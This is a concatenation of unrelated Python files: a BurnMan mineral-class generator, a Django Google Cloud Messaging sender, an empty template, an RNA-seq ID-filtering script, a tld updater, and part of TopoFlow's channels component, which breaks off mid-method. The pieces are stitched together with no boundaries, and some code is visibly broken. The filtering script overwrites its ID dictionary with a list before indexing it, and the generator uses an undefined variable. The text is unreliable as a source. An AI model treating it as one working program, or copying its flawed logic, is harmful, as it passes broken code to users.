print '"""'
print ''
print 'from burnman.mineral import Mineral'
print 'from burnman.solidsolution import SolidSolution'
print 'from burnman.solutionmodel import *'
print 'from burnman.processchemistry import read_masses, dictionarize_formula, formula_mass'
print ''
print 'atomic_masses=read_masses()'
print ''

print '"""'
print 'ENDMEMBERS'
print '"""'     
print ''

param_scales = [  -1., -1., #not nubmers, so we won't scale
                  1.e3, 1.e3, #kJ -> J
                  1.0, # J/K/mol
                  1.e-5, # kJ/kbar/mol -> m^3/mol
                  1.e3, 1.e-2, 1.e3, 1.e3, # kJ -> J and table conversion for b
                  1.e-5, # table conversion
                  1.e8, # kbar -> Pa
                  1.0, # no scale for K'0
                  1.e-8] #GPa -> Pa # no scale for eta_s 
           

formula='0'
for idx, m in enumerate(ds):
    if idx == 0:
        param_names=m
    else:   
        print 'class', m[0].lower(), '(Mineral):'
        print '    def __init__(self):'
        print ''.join(['        formula=\'',m[1],'\''])
        print '        formula = dictionarize_formula(formula)'
        print '        self.params = {'
        print ''.join(['            \'name\': \'', m[0], '\','])
        print '            \'formula\': formula,'
        print '            \'equation_of_state\': \'hp_tmt\','
        for pid, param in enumerate(m):
            if pid > 1 and pid != 3 and pid<6:
                print '            \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','

        print '            \'Cp\':', [round(float(m[i])*param_scales[i],10) for i in [6, 7, 8, 9]], ','
        for pid, param in enumerate(m):
            if pid > 9:
                print '            \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','



        print '            \'n\': sum(formula.values()),'
        print '            \'molar_mass\': formula_mass(formula, atomic_masses)}'
        print ''
        print '        self.uncertainties = {'
        print '            \''+param_names[3]+'\':', float(m[3])*param_scales[3], '}'

        print '        Mineral.__init__(self)'
        print ''

# -*- encoding: utf-8 -*-

try:
    from httplib import HTTPSConnection
    from urlparse import urlparse
except ImportError:
    from http.client import HTTPSConnection
    from urllib.parse import urlparse

from json import dumps, loads
from django.conf import settings


class GCMError(Exception):
    pass


def send(user, message, **kwargs):
    """
    Site: https://developers.google.com
    API: https://developers.google.com/cloud-messaging/
    Desc: Android notifications
    """

    headers = {
        "Content-type": "application/json",
        "Authorization": "key=" + kwargs.pop("gcm_key", settings.GCM_KEY)
    }

    hook_url = 'https://android.googleapis.com/gcm/send'

    data = {
        "registration_ids": [user],
        "data": {
            "title": kwargs.pop("event"),
            'message': message,
        }
    }
    data['data'].update(kwargs)

    up = urlparse(hook_url)
    http = HTTPSConnection(up.netloc)
    http.request(
        "POST", up.path,
        headers=headers,
        body=dumps(data))
    response = http.getresponse()

    if response.status != 200:
        raise GCMError(response.reason)

    body = response.read()
    if loads(body).get("failure") > 0:
        raise GCMError(repr(body))
    return True

#-------------------------------------------------------------------------------
# Name:        module1
# Purpose:
#
# Author:      Eli
#
# Created:     06/04/2014
# Copyright:   (c) Eli 2014
# Licence:     <your licence>
#-------------------------------------------------------------------------------

def main():
    pass

if __name__ == '__main__':
    main()

import sys

#This script filters a data file by id's listed one per line in another file

ids = open("C:/rnaseq/mirna_data/clusters/10rep_redo_deseq-edger/DEseq2_1cpm3redo_nopara2_logFCall.txt", "r")

#Take header from ID file & initialize empty dict
head_ids = ids.readline().strip("\n")
idlist1 = {}
#id_count = 0
#Make dict of ID's (key) & selected variables/annotations (values)
for line in ids:
    name = line.strip('\n').split('\t')[0]
    #name = name[4:]
    #if len(name.split('-')) > 3:
    #    name = '-'.join(name.split('-')[1:])
        #arm = name.split('-')[-1]
        #name = '-'.join(['-'.join(name.split('-')[0:2]), arm])
    name = name.strip('cin-')
    #print name
    #name = name[-5:]
    #values = '\t'.join(line.strip('\n').split('\t')[1:3])
    values = '\t'.join(line.strip('\n').split('\t')[1:4])
    #if "ENSCINP" in values:
    #    values2 = values[7:]
    #    values = "ENSCINT" + values2
    #values = '\t'.join(line.strip('\n').split('\t')[2:])
    #values = values[0:-3]
    if name in idlist1 and len(name) > 0:
        if values in idlist1[name]:
            continue
        else:
            idlist1[name].append(values)
    elif len(name) > 0:
        idlist1[name] = [values]
    #id_count+=1
    #if id_count%1000==0:
    #    print id_count

ids.close

#Debugging code below:
#print 'idlist1:', len(idlist1)
#sorted(idlist1)
#print idlist1
idlist1 = ['miR-216']

data = open("C:/rnaseq/coexpression/mirna-mrna/logfc_pearson/1cpm3_5rpkm3_redo2_edger_logfcValues_pearson_targetscan_deseq2logfc_mirs2.txt", "r")

#Output merged header & initialize retrieved list + row counter
#sys.stdout.write("LogFC.consensus" + '\t' + data.readline())
#sys.stdout.write("LogFC.consensus" + '\t' + '\t'.join(data.readline().split('\t')[0:3]) + '\n')
#sys.stdout.write(data.readline())
#data.readline()
matched = 0
idlist2 = {}
out = 0

#Match ID's between lists and return associated variables
for line in data:
    #print line
    name = line.strip('\n').split('\t')[6]
    #print name
    #name = name.split('|')[3].split('.')[0] # for first ID from BLAST target
    #name = name[0:7]
    #if name[-1].isalpha():
    #    name = name[0:-1]
    #print name
    #variables = line.strip('\n').split('\t')[5,9,10]
    #idlist2[name] = line.split('\t')[1]
    descr = line.strip('\n').split('\t')[1]
    #if "," in descr:
    #    descr = descr.split(',')[0]
    #name = line[1:20] # for trimmed encin gene name
    #kh = '.'.join(line.split('\t')[1].split(':')[1].split('.')[0:4])

    #Loop through input dict ID's and search for "name" in associated variables
    #for item in idlist1: #Loop through keys (refseq)
    if name in idlist1: #match primary ID's
        #for item in idlist1[name].split(' '):
            sys.stdout.write('\t'.join(idlist1[0]) + '\t' + line)
                #EXCHANGE ID'S BUT KEEP REST OF LINE/DESCRIPTION
    #            sys.stdout.write(descr + '\t' + '\t'.join(idlist1[name]) + '\n')
    #else:
    #    sys.stdout.write(descr + '\t' + name + '\n')
                #print idlist1[name]
                #sys.stdout.write(line.strip('\n') + '\t' + '\t'.join(idlist1[name]) + '\n')
                #continue
                #matched +=1
    else:
        sys.stdout.write(line)
        #if name in idlist1[item]: #Check for each ID in the name variable
        #    idlist2[name] = variables
    #            values = idlist1[item]
    #            stop = 1
                #while stop <= len(values):
     #   if descr in idlist1[name]:
     #       sys.stdout.write(line)
        #    out+=1
#print out
#Return items in matched list (idlist2) using associations from idlist1
#for mir in idlist1:
#    if mir in idlist2:
#        sys.stdout.write(mir + '\t' + '\t'.join(idlist2[mir]) + '\n')
#    for mrna in idlist1[mir]:
#        if mrna in idlist2:
#            sys.stdout.write(mrna+ '\t' + '\t'.join(idlist2[mrna]) + '\n')

                #if len(idlist1[name]) > 1:
                #   for value in idlist1[name]: #Print all values on separate lines
                #        sys.stdout.write(value + '\t' + line)
                        #sys.stdout.write(descr + '\t' + value + '\t' + name + '\t' + '\t'.join(variables) + '\n')
                #        sys.stdout.write(value + '\t' + '\t'.join(line.split('\t')[0:]))
                        #sys.stdout.write(value + '\t' + '\t'.join(line.split('\t')[0:3]) + '\n')
                #        out+=1
                #else:
                #    sys.stdout.write('\t'.join(idlist1[name]) + '\t' + line)
                    #sys.stdout.write(descr + '\t' + ".\t".join(idlist1[name]) + '\t' + name + '\t' + '\t'.join(variables) + '\n')
                    #print idlist1[name]
                #    sys.stdout.write(('\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[0:])))
                    #sys.stdout.write(name + '\t' + '\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[2:]))
                #    out+=1

#print matched, out
                        #print gene
                        #print idlist1[item]
    #                    sys.stdout.write(value + "\t" + name + '\t' + line)#'\t' + '\t'.join(line.split('\t')[2:]))
    #                    stop+=1
                        #continue

    #if name in idlist1:
    #    if descr in idlist1[name]:
    #        sys.stdout.write(line)
    #        descr = idlist1[name]
    #    sys.stdout.write('\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[2:]))
        #sys.stdout.write('\t'.join(line.split('\t')[0:2]) + '\t' + descr + '\n')
        #del idlist1[name]
    #else:
    #    pass
        #sys.stdout.write(line + '\n')
        #if name in idlist2:
         #   pass
        #else:
            #idlist2.append(name)
            #idlist1.remove(name)
            #print line
        #count+=1

#Code for checking remaining values in ID list
#for item in idlist1:
#    print "bakow!"
#    sys.stdout.write(item + '\t' + idlist2[item] + '\t' + idlist1[item] + '\n')
    #else:
     #   print line.split('\t')[0]
#print len(idlist1), len(idlist2)
#print len(idlist1)-len(idlist2)
#print len(idlist1)
#sorted(idlist2)
#print idlist1
#for item in idlist2:
#    if item in idlist1:
#        idlist1.remove(item)
#print 'idlist1-idlist2', len(idlist1)
#for item in idlist1:
#    print item


#cross check input and output lists
#idlist3= []
#for thing in idlist1:
#    if thing in idlist2:
#        pass
#    else:
#        idlist3.append(thing)

#print len(idlist3)
#print len(idlist4)
#idlist4 = [x for x in idlist1 if x not in idlist2]
from __future__ import print_function

"""
Deprecated. Use ``update-tld-names`` command instead.
"""

__title__ = 'tld.update'
__author__ = 'Artur Barseghyan'
__copyright__ = '2013-2015 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'

from tld.utils import update_tld_names

_ = lambda x: x

if __name__ == '__main__':
    update_tld_names()
    print(_("Local TLD names file has been successfully updated!"))



## See "d_bankfull" in update_flow_depth()  ######## (2/21/13)

## See "(5/13/10)" for a temporary fix.
#------------------------------------------------------------------------
#  Copyright (c) 2001-2014, Scott D. Peckham
#
#  Sep 2014.  Wrote new update_diversions().
#             New standard names and BMI updates and testing.
#  Nov 2013.  Converted TopoFlow to a Python package.
#  Feb 2013.  Adapted to use EMELI framework.
#  Jan 2013.  Shared scalar doubles are now 0D numpy arrays.
#             This makes them mutable and allows components with
#             a reference to them to see them change.
#             So far:  Q_outlet, Q_peak, Q_min...
#  Jan 2013.  Revised handling of input/output names.
#  Oct 2012.  CSDMS Standard Names and BMI.
#  May 2012.  Commented out diversions.update() for now.  #######
#  May 2012.  Shared scalar doubles are now 1-element 1D numpy arrays.
#             This makes them mutable and allows components with
#             a reference to them to see them change.
#             So far:  Q_outlet, Q_peak, Q_min...
#  May 2010.  Changes to initialize() and read_cfg_file()
#  Mar 2010.  Changed codes to code, widths to width,
#             angles to angle, nvals to nval, z0vals to z0val,
#             slopes to slope (for GUI tools and consistency
#             across all process components)
#  Aug 2009.  Updates.
#  Jul 2009.  Updates.
#  May 2009.  Updates.
#  Jan 2009.  Converted from IDL.

#-----------------------------------------------------------------------
#  NB!     In the CFG file, change MANNING and LAW_OF_WALL flags to
#          a single string entry like "friction method".   #########
#-----------------------------------------------------------------------
#  Notes:  Set self.u in manning and law_of_wall functions ??
#          Update friction factor in manning() and law_of_wall() ?
#          Double check how Rh is used in law_of_the_wall().

#          d8_flow has "flow_grids", but this one has "codes".
#          Make sure values are not stored twice.
#-----------------------------------------------------------------------

#-----------------------------------------------------------------------
#  NOTES:  This file defines a "base class" for channelized flow
#          components as well as functions used by most or
#          all channel flow methods.  The methods of this class
#          (especially "update_velocity") should be over-ridden as
#          necessary for different methods of modeling channelized
#          flow.  See channels_kinematic_wave.py,
#          channels_diffusive_wave.py and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
#  NOTES:  update_free_surface_slope() is called by the
#          update_velocity() methods of channels_diffusive_wave.py
#          and channels_dynamic_wave.py.
#-----------------------------------------------------------------------
#
#  class channels_component
#
#      ## get_attribute()        # (defined in each channel component)
#      get_input_var_names()     # (5/15/12)
#      get_output_var_names()    # (5/15/12)
#      get_var_name()            # (5/15/12)
#      get_var_units()           # (5/15/12)
#-----------------------------
#      set_constants()
#      initialize()
#      update()
#      finalize()
#      set_computed_input_vars()   # (5/11/10)
#----------------------------------
#      initialize_d8_vars()          ########
#      initialize_computed_vars()
#      initialize_diversion_vars()      # (9/22/14)
#      initialize_outlet_values()
#      initialize_peak_values()
#      initialize_min_and_max_values()  # (2/3/13)
#-------------------------------------
#      update_R()
#      update_R_integral()
#      update_discharge()
#      update_diversions()          # (9/22/14)
#      update_flow_volume()
#      update_flow_depth()
#      update_free_surface_slope()
#      update_shear_stress()        # (9/9/14, depth-slope product)
#      update_shear_speed()         # (9/9/14)
#      update_trapezoid_Rh()
#      update_friction_factor()     # (9/9/14)
#----------------------------------
#      update_velocity()            # (override as needed)
#      update_velocity_on_edges()
#      update_froude_number()       # (9/9/14)
#----------------------------------
#      update_outlet_values()
#      update_peak_values()         # (at the main outlet)
#      update_Q_out_integral()      # (moved here from basins.py)
#      update_mins_and_maxes()      # (don't add into update())
#      check_flow_depth()
#      check_flow_velocity()
#----------------------------------
#      open_input_files()
#      read_input_files()
#      close_input_files()
#----------------------------------
#      update_outfile_names()
#      bundle_output_files()        # (9/21/14. Not used yet)
#      open_output_files()
#      write_output_files()
#      close_output_files()
#      save_grids()
#      save_pixel_values()
#----------------------------------
#      manning_formula()
#      law_of_the_wall()
#      print_status_report()
#      remove_bad_slopes() 

#  Functions:               # (stand-alone versions of these)
#      Trapezoid_Rh()
#      Manning_Formula()
#      Law_of_the_Wall()
    
#-----------------------------------------------------------------------

import numpy as np
import os, os.path

from topoflow.utils import BMI_base

# from topoflow.utils import d8_base

from topoflow.utils import file_utils  ###
from topoflow.utils import model_input
from topoflow.utils import model_output
from topoflow.utils import ncgs_files  ###
from topoflow.utils import ncts_files  ###
from topoflow.utils import rtg_files   ###
from topoflow.utils import text_ts_files   ###
from topoflow.utils import tf_d8_base as d8_base
from topoflow.utils import tf_utils

#-----------------------------------------------------------------------
class channels_component( BMI_base.BMI_component ):

    #-----------------------------------------------------------
    # Note: rainfall_volume_flux *must* be liquid-only precip.
    #-----------------------------------------------------------        
    _input_var_names = [
        'atmosphere_water__rainfall_volume_flux',          # (P_rain)
        'glacier_ice__melt_volume_flux',                   # (MR)
        ## 'land_surface__elevation',
        ## 'land_surface__slope',
        'land_surface_water__baseflow_volume_flux',        # (GW)
        'land_surface_water__evaporation_volume_flux',     # (ET)
        'soil_surface_water__infiltration_volume_flux',    # (IN)
        'snowpack__melt_volume_flux',                      # (SM)
        'water-liquid__mass-per-volume_density' ]           # (rho_H2O)
        #------------------------------------------------------------------
#         'canals__count',                                   # n_canals
#         'canals_entrance__x_coordinate',                   # canals_in_x
#         'canals_entrance__y_coordinate',                   # canals_in_y
#         'canals_entrance_water__volume_fraction',          # Q_canals_fraction
#         'canals_exit__x_coordinate',                       # canals_out_x
#         'canals_exit__y_coordinate',                       # canals_out_y
#         'canals_exit_water__volume_flow_rate',             # Q_canals_out
#         'sinks__count',                                    # n_sinks
#         'sinks__x_coordinate',                             # sinks_x
#         'sinks__y_coordinate',                             # sinks_y
#         'sinks_water__volume_flow_rate',                   # Q_sinks
#         'sources__count',                                  # n_sources
#         'sources__x_coordinate',                           # sources_x
#         'sources__y_coordinate',                           # sources_y
#         'sources_water__volume_flow_rate' ]                # Q_sources
        
    #----------------------------------
    # Maybe add these out_vars later.
    #----------------------------------
    #  ['time_sec', 'time_min' ]
    
    _output_var_names = [
        'basin_outlet_water_flow__half_of_fanning_friction_factor',        # f_outlet
        'basin_outlet_water_x-section__mean_depth',                        # d_outlet
        'basin_outlet_water_x-section__peak_time_of_depth',                # Td_peak
        'basin_outlet_water_x-section__peak_time_of_volume_flow_rate',     # T_peak
        'basin_outlet_water_x-section__peak_time_of_volume_flux',          # Tu_peak
        'basin_outlet_water_x-section__time_integral_of_volume_flow_rate', # vol_Q
        'basin_outlet_water_x-section__time_max_of_mean_depth',            # d_peak
        'basin_outlet_water_x-section__time_max_of_volume_flow_rate',      # Q_peak
        'basin_outlet_water_x-section__time_max_of_volume_flux',           # u_peak
        'basin_outlet_water_x-section__volume_flow_rate',                  # Q_outlet
        'basin_outlet_water_x-section__volume_flux',                       # u_outlet
         #--------------------------------------------------
        'canals_entrance_water__volume_flow_rate',                         # Q_canals_in 
         #-------------------------------------------------- 
        'channel_bottom_surface__slope',                           # S_bed 
        'channel_bottom_water_flow__domain_max_of_log_law_roughness_length',  # z0val_max
        'channel_bottom_water_flow__domain_min_of_log_law_roughness_length',  # z0val_min
        'channel_bottom_water_flow__log_law_roughness_length',                # z0val
        'channel_bottom_water_flow__magnitude_of_shear_stress',    # tau
        'channel_bottom_water_flow__shear_speed',                  # u_star
        'channel_centerline__sinuosity',                           # sinu
        'channel_water__volume',                                   # vol
        'channel_water_flow__froude_number',                       # froude
        'channel_water_flow__half_of_fanning_friction_factor',     # f
        'channel_water_flow__domain_max_of_manning_n_parameter',   # nval_max
        'channel_water_flow__domain_min_of_manning_n_parameter',   # nval_min
        'channel_water_flow__manning_n_parameter',                 # nval
        'channel_water_surface__slope',                            # S_free
        #---------------------------------------------------
        # These might only be available at the end of run.
        #---------------------------------------------------
        'channel_water_x-section__domain_max_of_mean_depth',       # d_max
        'channel_water_x-section__domain_min_of_mean_depth',       # d_min
        'channel_water_x-section__domain_max_of_volume_flow_rate', # Q_max
        'channel_water_x-section__domain_min_of_volume_flow_rate', # Q_min
        'channel_water_x-section__domain_max_of_volume_flux',      # u_max
        'channel_water_x-section__domain_min_of_volume_flux',      # u_min
        #---------------------------------------------------------------------    
        'channel_water_x-section__hydraulic_radius',               # Rh
        'channel_water_x-section__initial_mean_depth',             # d0
        'channel_water_x-section__mean_depth',                     # d
        'channel_water_x-section__volume_flow_rate',               # Q  
        'channel_water_x-section__volume_flux',                    # u
        'channel_water_x-section__wetted_area',                    # A_wet
        'channel_water_x-section__wetted_perimeter',               # P_wet
        ## 'channel_water_x-section_top__width',                   # (not used)
        'channel_x-section_trapezoid_bottom__width',               # width
        'channel_x-section_trapezoid_side__flare_angle',           # angle
        'land_surface_water__runoff_volume_flux',                  # R  
        'land_surface_water__domain_time_integral_of_runoff_volume_flux', # vol_R     
        'model__time_step',                                        # dt
        'model_grid_cell__area' ]                                  # da
        
    _var_name_map = {
        'atmosphere_water__rainfall_volume_flux':              'P_rain',
        'glacier_ice__melt_volume_flux':                       'MR',
        ## 'land_surface__elevation':                          'DEM',
        ## 'land_surface__slope':                              'S_bed',
        'land_surface_water__baseflow_volume_flux':            'GW',
        'land_surface_water__evaporation_volume_flux':         'ET',
        'soil_surface_water__infiltration_volume_flux':        'IN',
        'snowpack__melt_volume_flux':                          'SM',
        'water-liquid__mass-per-volume_density':               'rho_H2O',
        #------------------------------------------------------------------------
        'basin_outlet_water_flow__half_of_fanning_friction_factor':'f_outlet',
        'basin_outlet_water_x-section__mean_depth':                'd_outlet',
        'basin_outlet_water_x-section__peak_time_of_depth':            'Td_peak',
        'basin_outlet_water_x-section__peak_time_of_volume_flow_rate': 'T_peak',
        'basin_outlet_water_x-section__peak_time_of_volume_flux':      'Tu_peak',
        'basin_outlet_water_x-section__volume_flow_rate':            'Q_outlet',
        'basin_outlet_water_x-section__volume_flux':                 'u_outlet',
        'basin_outlet_water_x-section__time_integral_of_volume_flow_rate': 'vol_Q',
        'basin_outlet_water_x-section__time_max_of_mean_depth':      'd_peak',
        'basin_outlet_water_x-section__time_max_of_volume_flow_rate':'Q_peak',
        'basin_outlet_water_x-section__time_max_of_volume_flux':     'u_peak',
        #--------------------------------------------------------------------------
        'canals_entrance_water__volume_flow_rate':                 'Q_canals_in', 
        #--------------------------------------------------------------------------    
        'channel_bottom_surface__slope':                           'S_bed',
        'channel_bottom_water_flow__domain_max_of_log_law_roughness_length': 'z0val_max',
        'channel_bottom_water_flow__domain_min_of_log_law_roughness_length': 'z0val_min',
        'channel_bottom_water_flow__log_law_roughness_length':     'z0val',
        'channel_bottom_water_flow__magnitude_of_shear_stress':    'tau',
        'channel_bottom_water_flow__shear_speed':                  'u_star',
        'channel_centerline__sinuosity':                           'sinu',
        'channel_water__volume':                                   'vol',
        'channel_water_flow__domain_max_of_manning_n_parameter':   'nval_max',
        'channel_water_flow__domain_min_of_manning_n_parameter':   'nval_min',
        'channel_water_flow__froude_number':                       'froude',
        'channel_water_flow__half_of_fanning_friction_factor':     'f',
        'channel_water_flow__manning_n_parameter':                 'nval',
        'channel_water_surface__slope':                            'S_free',
        #-----------------------------------------------------------------------
        'channel_water_x-section__domain_max_of_mean_depth':       'd_max',
        'channel_water_x-section__domain_min_of_mean_depth':       'd_min',
        'channel_water_x-section__domain_max_of_volume_flow_rate': 'Q_max',
        'channel_water_x-section__domain_min_of_volume_flow_rate': 'Q_min',
        'channel_water_x-section__domain_max_of_volume_flux':      'u_max',
        'channel_water_x-section__domain_min_of_volume_flux':      'u_min',
        #-----------------------------------------------------------------------      
        'channel_water_x-section__hydraulic_radius':               'Rh',
        'channel_water_x-section__initial_mean_depth':             'd0',
        'channel_water_x-section__mean_depth':                     'd',
        'channel_water_x-section__volume_flow_rate':               'Q',                
        'channel_water_x-section__volume_flux':                    'u',
        'channel_water_x-section__wetted_area':                    'A_wet',
        'channel_water_x-section__wetted_perimeter':               'P_wet',
        ## 'channel_water_x-section_top__width':                   # (not used)
        'channel_x-section_trapezoid_bottom__width':               'width',   ####
        'channel_x-section_trapezoid_side__flare_angle':           'angle',   ####
        'land_surface_water__domain_time_integral_of_runoff_volume_flux': 'vol_R',
        'land_surface_water__runoff_volume_flux':                  'R',
        'model__time_step':                                        'dt',
        'model_grid_cell__area':                                   'da',
        #------------------------------------------------------------------
        'canals__count':                          'n_canals',
        'canals_entrance__x_coordinate':          'canals_in_x',
        'canals_entrance__y_coordinate':          'canals_in_y',
        'canals_entrance_water__volume_fraction': 'Q_canals_fraction',
        'canals_exit__x_coordinate':              'canals_out_x',
        'canals_exit__y_coordinate':              'canals_out_y',
        'canals_exit_water__volume_flow_rate':    'Q_canals_out',
        'sinks__count':                           'n_sinks',
        'sinks__x_coordinate':                    'sinks_x',
        'sinks__y_coordinate':                    'sinks_y',
        'sinks_water__volume_flow_rate':          'Q_sinks',
        'sources__count':                         'n_sources',
        'sources__x_coordinate':                  'sources_x',
        'sources__y_coordinate':                  'sources_y',
        'sources_water__volume_flow_rate':        'Q_sources' }


    #------------------------------------------------
    # Create an "inverse var name map"
    # inv_map = dict(zip(map.values(), map.keys()))
    #------------------------------------------------
##    _long_name_map = dict( zip(_var_name_map.values(),
##                               _var_name_map.keys() ) )

    _var_units_map = {
        'atmosphere_water__rainfall_volume_flux':              'm s-1',
        'glacier_ice__melt_volume_flux':                       'm s-1',
        ## 'land_surface__elevation':                          'm',
        ## 'land_surface__slope':                              '1',
        'land_surface_water__baseflow_volume_flux':            'm s-1',
        'land_surface_water__evaporation_volume_flux':         'm s-1',
        'soil_surface_water__infiltration_volume_flux':        'm s-1',
        'snowpack__melt_volume_flux':                          'm s-1',
        'water-liquid__mass-per-volume_density':               'kg m-3',
        #--------------------------------------------------------------------------- 
        'basin_outlet_water_flow__half_of_fanning_friction_factor':        '1',       
        'basin_outlet_water_x-section__mean_depth':                        'm',
        'basin_outlet_water_x-section__peak_time_of_depth':                'min',
        'basin_outlet_water_x-section__peak_time_of_volume_flow_rate':     'min',
        'basin_outlet_water_x-section__peak_time_of_volume_flux':          'min',        
        'basin_outlet_water_x-section__time_integral_of_volume_flow_rate': 'm3',
        'basin_outlet_water_x-section__time_max_of_mean_depth':            'm',
        'basin_outlet_water_x-section__time_max_of_volume_flow_rate':      'm3 s-1',
        'basin_outlet_water_x-section__time_max_of_volume_flux':           'm s-1',
        'basin_outlet_water_x-section__volume_flow_rate':                  'm3',
        'basin_outlet_water_x-section__volume_flux':                       'm s-1',
        #---------------------------------------------------------------------------
        'canals_entrance_water__volume_flow_rate':                 'm3 s-1', 
        #---------------------------------------------------------------------------  
        'channel_bottom_surface__slope':                           '1',
        'channel_bottom_water_flow__domain_max_of_log_law_roughness_length':  'm',
        'channel_bottom_water_flow__domain_min_of_log_law_roughness_length':  'm',
        'channel_bottom_water_flow__log_law_roughness_length':     'm',
        'channel_bottom_water_flow__magnitude_of_shear_stress':    'kg m-1 s-2',
        'channel_bottom_water_flow__shear_speed':                  'm s-1',
        'channel_centerline__sinuosity':                           '1',    
        'channel_water__volume':                                   'm3', 
        'channel_water_flow__froude_number':                       '1',
        'channel_water_flow__half_of_fanning_friction_factor':     '1',               
        'channel_water_flow__manning_n_parameter':                 'm-1/3 s',
        'channel_water_flow__domain_max_of_manning_n_parameter':   'm-1/3 s',
        'channel_water_flow__domain_min_of_manning_n_parameter':   'm-1/3 s',
        'channel_water_surface__slope':                            '1',
        #--------------------------------------------------------------------
        'channel_water_x-section__domain_max_of_mean_depth':       'm',
        'channel_water_x-section__domain_min_of_mean_depth':       'm',
        'channel_water_x-section__domain_max_of_volume_flow_rate': 'm3 s-1',
        'channel_water_x-section__domain_min_of_volume_flow_rate': 'm3 s-1',
        'channel_water_x-section__domain_max_of_volume_flux':      'm s-1',
        'channel_water_x-section__domain_min_of_volume_flux':      'm s-1',
        #--------------------------------------------------------------------
        'channel_water_x-section__hydraulic_radius':               'm',
        'channel_water_x-section__initial_mean_depth':             'm',
        'channel_water_x-section__mean_depth':                     'm',
        'channel_water_x-section__volume_flow_rate':               'm3 s-1',
        'channel_water_x-section__volume_flux':                    'm s-1',
        'channel_water_x-section__wetted_area':                    'm2',
        'channel_water_x-section__wetted_perimeter':               'm',
        'channel_x-section_trapezoid_bottom__width':               'm',
        'channel_x-section_trapezoid_side__flare_angle':           'rad', # CHECKED 
        'land_surface_water__domain_time_integral_of_runoff_volume_flux': 'm3',  
        'land_surface_water__runoff_volume_flux':                  'm s-1',        
        'model__time_step':                                        's',
        'model_grid_cell__area':                                   'm2',
        #------------------------------------------------------------------
        'canals__count':                          '1',
        'canals_entrance__x_coordinate':          'm',
        'canals_entrance__y_coordinate':          'm',
        'canals_entrance_water__volume_fraction': '1',
        'canals_exit__x_coordinate':              'm',
        'canals_exit__y_coordinate':              'm',
        'canals_exit_water__volume_flow_rate':    'm3 s-1',
        'sinks__count':                           '1',
        'sinks__x_coordinate':                    'm',
        'sinks__y_coordinate':                    'm',
        'sinks_water__volume_flow_rate':          'm3 s-1',
        'sources__count':                         '1',
        'sources__x_coordinate':                  'm',
        'sources__y_coordinate':                  'm',
        'sources_water__volume_flow_rate':        'm3 s-1' }

    #------------------------------------------------    
    # Return NumPy string arrays vs. Python lists ?
    #------------------------------------------------
    ## _input_var_names  = np.array( _input_var_names )
    ## _output_var_names = np.array( _output_var_names )
        
    #-------------------------------------------------------------------
    def get_input_var_names(self):

        #--------------------------------------------------------
        # Note: These are currently variables needed from other
        #       components vs. those read from files or GUI.
        #--------------------------------------------------------   
        return self._input_var_names
    
    #   get_input_var_names()
    #-------------------------------------------------------------------
    def get_output_var_names(self):
 
        return self._output_var_names
    
    #   get_output_var_names()
    #-------------------------------------------------------------------
    def get_var_name(self, long_var_name):
            
        return self._var_name_map[ long_var_name ]

    #   get_var_name()
    #-------------------------------------------------------------------
    def get_var_units(self, long_var_name):

        return self._var_units_map[ long_var_name ]
   
    #   get_var_units()
    #-------------------------------------------------------------------
##    def get_var_type(self, long_var_name):
##
##        #---------------------------------------
##        # So far, all vars have type "double",
##        # but use the one in BMI_base instead.
##        #---------------------------------------
##        return 'float64'
##    
##    #   get_var_type()
    #-------------------------------------------------------------------
    def set_constants(self):

        #------------------------
        # Define some constants
        #------------------------
        self.g          = np.float64(9.81)    # (gravitation const.)
        self.aval       = np.float64(0.476)   # (integration const.)
        self.kappa      = np.float64(0.408)   # (von Karman's const.)
        self.law_const  = np.sqrt(self.g) / self.kappa
        self.one_third  = np.float64(1.0) / 3.0        
        self.two_thirds = np.float64(2.0) / 3.0
        self.deg_to_rad = np.pi / 180.0
        
    #   set_constants()
    #-------------------------------------------------------------------
    def initialize(self, cfg_file=None, mode="nondriver", SILENT=False): 

        if not(SILENT):
            print ' '
            print 'Channels component: Initializing...'
        
        self.status   = 'initializing'  # (OpenMI 2.0 convention)
        self.mode     = mode
        self.cfg_file = cfg_file
        
        #-----------------------------------------------
        # Load component parameters from a config file
        #-----------------------------------------------
        self.set_constants()           # (12/7/09)
        # print 'CHANNELS calling initialize_config_vars()...'
        self.initialize_config_vars()   
        # print 'CHANNELS calling read_grid_info()...'
        self.read_grid_info()
        #print 'CHANNELS calling initialize_basin_vars()...'
        self.initialize_basin_vars()  # (5/14/10)
        #-----------------------------------------
        # This must come before "Disabled" test.
        #-----------------------------------------
        # print 'CHANNELS calling initialize_time_vars()...'
        self.initialize_time_vars()
        
        #----------------------------------
        # Has component been turned off ?
        #----------------------------------
        if (self.comp_status == 'Disabled'):
            if not(SILENT):
                print 'Channels component: Disabled.'
            self.SAVE_Q_GRIDS  = False   # (It is True by default.)
            self.SAVE_Q_PIXELS = False   # (It is True by default.)
            self.DONE = True
            self.status = 'initialized'  # (OpenMI 2.0 convention) 
            return

##        print '################################################'
##        print 'min(d0), max(d0) =', self.d0.min(), self.d0.max()
##        print '################################################'
        
        #---------------------------------------------
        # Open input files needed to initialize vars 
        #---------------------------------------------
        # Can't move read_input_files() to start of
        # update(), since initial values needed here.
        #---------------------------------------------
        # print 'CHANNELS calling open_input_files()...'
        self.open_input_files()
        print 'CHANNELS calling read_input_files()...'
        self.read_input_files()

        #-----------------------
        # Initialize variables
        #-----------------------
        print 'CHANNELS calling initialize_d8_vars()...'
        self.initialize_d8_vars()  # (depend on D8 flow grid)
        print 'CHANNELS calling initialize_computed_vars()...'
        self.initialize_computed_vars()

        #--------------------------------------------------
        # (5/12/10) I think this is obsolete now.
        #--------------------------------------------------
        # Make sure self.Q_ts_file is not NULL (12/22/05)
        
        # This is only output file that is set by default
        # and is still NULL if user hasn't opened the
        # output var dialog for the channel process.
        #--------------------------------------------------
##        if (self.SAVE_Q_PIXELS and (self.Q_ts_file == '')):    
##            self.Q_ts_file = (self.case_prefix + '_0D-Q.txt')       

        self.open_output_files()
        self.status = 'initialized'  # (OpenMI 2.0 convention) 
        
    #   initialize()
    #-------------------------------------------------------------------
    ## def update(self, dt=-1.0, time_seconds=None):
    def update(self, dt=-1.0):

        #---------------------------------------------
        # Note that u and d from previous time step
        # must be used on RHS of the equations here.
        #---------------------------------------------
